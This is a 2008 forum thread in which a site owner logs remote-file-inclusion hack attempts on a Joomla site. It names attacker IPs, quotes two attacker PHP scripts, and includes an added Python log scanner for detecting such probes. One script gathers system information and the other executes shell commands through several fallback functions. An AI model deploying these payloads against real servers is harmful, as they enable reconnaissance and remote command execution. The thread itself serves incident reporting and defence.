Bloody Hackers

Alan
Site Owner
Posts: 1788
Joined: Sun Mar 30, 2008 6:30 pm
Location: Shropshire, UK.

Bloody Hackers

Post by Alan » Sat Apr 05, 2008 11:14 pm

Would you believe there has been a hack attempt made to the site already? The user has been deleted and all posts removed. If anyone is getting strange emails etc., let me know ASAP.

Alan.


Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 2:52 am

Hacker Number One, a Romanian using IP 193.200.252.43, trying the script that refers to the exact path to 'mos_config', which is the config file for Joomla-based websites.
HACK -

http://mahindra-register.org/index.php? ... md-asc.txt???

SCRIPT -

<?
echo "/Mic22/<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "/Mic22/<br>";
exit;
?>
Whois data -



Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:07 am

Hacker number 2, using a similar attack to number one. This idiot is in Germany on IP 62.75.214.214.
HACK -
http://mahindra-register.org/index.php? ... an/id2.txt??

SCRIPT -
<?php
echo "jimmywho";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;


Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:15 am

And finally for today, a Russian moron on IP 193.200.252.43 using the same script as moron 1.
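
The requests quoted in the posts above pass a remote `.txt` URL, padded with trailing `?` characters, as a query parameter to `index.php`. As an added example (not part of the original posts and not the site's own tooling), this Python sketch flags that pattern in web server access logs; it generalizes to any parameter name and to `ftp://` values, and the log lines, IPs, hosts and the `some_path` parameter are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (combined log format). The IPs and hosts are
# documentation values and "some_path" is a hypothetical parameter name.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Apr/2008:02:41:07 +0100] "GET /index.php?option=com_content&task=view&id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Apr/2008:02:52:13 +0100] "GET /index.php?some_path=http://files.example.net/a/probe.txt??? HTTP/1.1" 200 812 "-" "libwww-perl/5.805"
203.0.113.5 - - [08/Apr/2008:03:07:44 +0100] "GET /index.php?option=com_x&some_path=http%3A%2F%2Ffiles.example.org%2Fid.txt%3F%3F HTTP/1.0" 404 0 "-" "-"
192.0.2.10 - - [08/Apr/2008:03:09:00 +0100] "GET /index.php?ref=http-equiv HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
# A parameter value that is itself an absolute URL; group 1 is the remote host.
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://([^/?#:\s]+)', re.I)


def find_rfi_probes(log_text):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, when, target, status = m.groups()
        _path, _, query = target.partition("?")
        # parse_qsl percent-decodes values, so encoded URLs are caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            hit = REMOTE_RE.match(value)
            if hit:
                findings.append({
                    "ip": ip, "time": when, "param": name,
                    "remote_host": hit.group(1).lower(),
                    # A trailing '?' turns whatever the application appends
                    # to the include path into a query string on the URL.
                    "suffix_trick": value.endswith("?"),
                    "status": int(status),
                })
    return findings


if __name__ == "__main__":
    for finding in find_rfi_probes(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only means `index.php` answered, not that the remote file was included. With `allow_url_include = Off` in php.ini, PHP refuses `http://` and `ftp://` targets in `include`/`require`.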


Re: Bloody Hackers

Post by Alan » Tue Apr 08, 2008 3:17 am

PS

If you 'l33t script kiddies' can read this post then you know what's coming. :club:

kev
Technical Expert
Posts: 1239
Joined: Tue Apr 01, 2008 8:58 pm
Location: west mids

Re: Bloody Hackers

Post by kev » Tue Apr 08, 2008 9:45 pm

I am glad you have caught these low life in the game :lol:
